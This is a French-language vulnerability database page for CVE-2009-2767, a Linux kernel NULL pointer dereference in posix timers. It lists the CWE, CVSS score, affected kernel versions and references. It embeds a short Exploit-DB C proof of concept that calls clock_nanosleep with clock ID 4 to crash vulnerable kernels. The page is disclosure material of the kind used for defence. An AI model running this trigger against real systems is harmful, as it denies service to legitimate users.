CVE-2009-2767 : Détail

CVE-2009-2767

Overflow
0.04%V3
Local
2009-08-14 13:00 +00:00
2017-08-16 12:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference.

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 33148

Date de publication : 2009-08-05 22:00 +00:00
Auteur : Hiroshi Shimamoto
EDB Vérifié : Yes

/* source: https://www.securityfocus.com/bid/35976/info The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed. This issue was introduced in Linux kernel 2.6.28-rc1 and fixed in 2.6.31-rc5-git3. */ #include <time.h> int main(void) { struct timespec ts; ts.tv_sec = 1; ts.tv_nsec = 0; return clock_nanosleep(4, 0, &ts, NULL); }

Products Mentioned

Configuraton 0

Linux>>Kernel >> Version 2.6.24.7

    Linux>>Kernel >> Version 2.6.25.15

      Linux>>Linux_kernel >> Version To (including) 2.6.16.31

        Linux>>Linux_kernel >> Version 2.6

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.10

        Linux>>Linux_kernel >> Version 2.6.11

        Linux>>Linux_kernel >> Version 2.6.11.1

        Linux>>Linux_kernel >> Version 2.6.11.2

        Linux>>Linux_kernel >> Version 2.6.11.3

        Linux>>Linux_kernel >> Version 2.6.11.4

        Linux>>Linux_kernel >> Version 2.6.11.5

        Linux>>Linux_kernel >> Version 2.6.11.6

        Linux>>Linux_kernel >> Version 2.6.11.7

        Linux>>Linux_kernel >> Version 2.6.11.8

        Linux>>Linux_kernel >> Version 2.6.11.9

        Linux>>Linux_kernel >> Version 2.6.11.10

        Linux>>Linux_kernel >> Version 2.6.11.11

        Linux>>Linux_kernel >> Version 2.6.11.12

        Linux>>Linux_kernel >> Version 2.6.12

        Linux>>Linux_kernel >> Version 2.6.12.1

        Linux>>Linux_kernel >> Version 2.6.12.2

        Linux>>Linux_kernel >> Version 2.6.12.3

        Linux>>Linux_kernel >> Version 2.6.12.4

        Linux>>Linux_kernel >> Version 2.6.12.5

        Linux>>Linux_kernel >> Version 2.6.12.6

        Linux>>Linux_kernel >> Version 2.6.13

        Linux>>Linux_kernel >> Version 2.6.13.1

        Linux>>Linux_kernel >> Version 2.6.13.2

        Linux>>Linux_kernel >> Version 2.6.13.3

        Linux>>Linux_kernel >> Version 2.6.13.4

        Linux>>Linux_kernel >> Version 2.6.13.5

        Linux>>Linux_kernel >> Version 2.6.14

        Linux>>Linux_kernel >> Version 2.6.14.1

        Linux>>Linux_kernel >> Version 2.6.14.2

        Linux>>Linux_kernel >> Version 2.6.14.3

        Linux>>Linux_kernel >> Version 2.6.14.4

        Linux>>Linux_kernel >> Version 2.6.14.5

        Linux>>Linux_kernel >> Version 2.6.14.6

        Linux>>Linux_kernel >> Version 2.6.14.7

        Linux>>Linux_kernel >> Version 2.6.15

        Linux>>Linux_kernel >> Version 2.6.15.1

        Linux>>Linux_kernel >> Version 2.6.15.2

        Linux>>Linux_kernel >> Version 2.6.15.3

        Linux>>Linux_kernel >> Version 2.6.15.4

        Linux>>Linux_kernel >> Version 2.6.15.5

        Linux>>Linux_kernel >> Version 2.6.15.6

        Linux>>Linux_kernel >> Version 2.6.15.7

        Linux>>Linux_kernel >> Version 2.6.16

        Linux>>Linux_kernel >> Version 2.6.16.1

        Linux>>Linux_kernel >> Version 2.6.16.2

        Linux>>Linux_kernel >> Version 2.6.16.3

        Linux>>Linux_kernel >> Version 2.6.16.10

        Linux>>Linux_kernel >> Version 2.6.16.11

        Linux>>Linux_kernel >> Version 2.6.16.12

        Linux>>Linux_kernel >> Version 2.6.16.13

        Linux>>Linux_kernel >> Version 2.6.16.14

        Linux>>Linux_kernel >> Version 2.6.16.15

        Linux>>Linux_kernel >> Version 2.6.16.16

        Linux>>Linux_kernel >> Version 2.6.16.17

        Linux>>Linux_kernel >> Version 2.6.16.18

        Linux>>Linux_kernel >> Version 2.6.16.19

        Linux>>Linux_kernel >> Version 2.6.16.20

        Linux>>Linux_kernel >> Version 2.6.16.21

        Linux>>Linux_kernel >> Version 2.6.16.22

        Linux>>Linux_kernel >> Version 2.6.16.23

        Linux>>Linux_kernel >> Version 2.6.16.24

        Linux>>Linux_kernel >> Version 2.6.16.25

        Linux>>Linux_kernel >> Version 2.6.16.26

        Linux>>Linux_kernel >> Version 2.6.16.27

        Linux>>Linux_kernel >> Version 2.6.16.28

        Linux>>Linux_kernel >> Version 2.6.16.29

        Linux>>Linux_kernel >> Version 2.6.16.30

        Linux>>Linux_kernel >> Version 2.6.16.31

        Linux>>Linux_kernel >> Version 2.6.16.31

          Linux>>Linux_kernel >> Version 2.6.16.31

            Linux>>Linux_kernel >> Version 2.6.16.31

              Linux>>Linux_kernel >> Version 2.6.16.31

                References

                http://secunia.com/advisories/36200
                Tags : third-party-advisory, x_refsource_SECUNIA
                http://lkml.org/lkml/2009/8/4/40
                Tags : mailing-list, x_refsource_MLIST
                http://www.vupen.com/english/advisories/2009/2197
                Tags : vdb-entry, x_refsource_VUPEN
                http://www.ubuntu.com/usn/USN-852-1
                Tags : vendor-advisory, x_refsource_UBUNTU
                http://www.openwall.com/lists/oss-security/2009/08/06/2
                Tags : mailing-list, x_refsource_MLIST
                http://lkml.org/lkml/2009/8/4/28
                Tags : mailing-list, x_refsource_MLIST
                http://secunia.com/advisories/37105
                Tags : third-party-advisory, x_refsource_SECUNIA
                Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.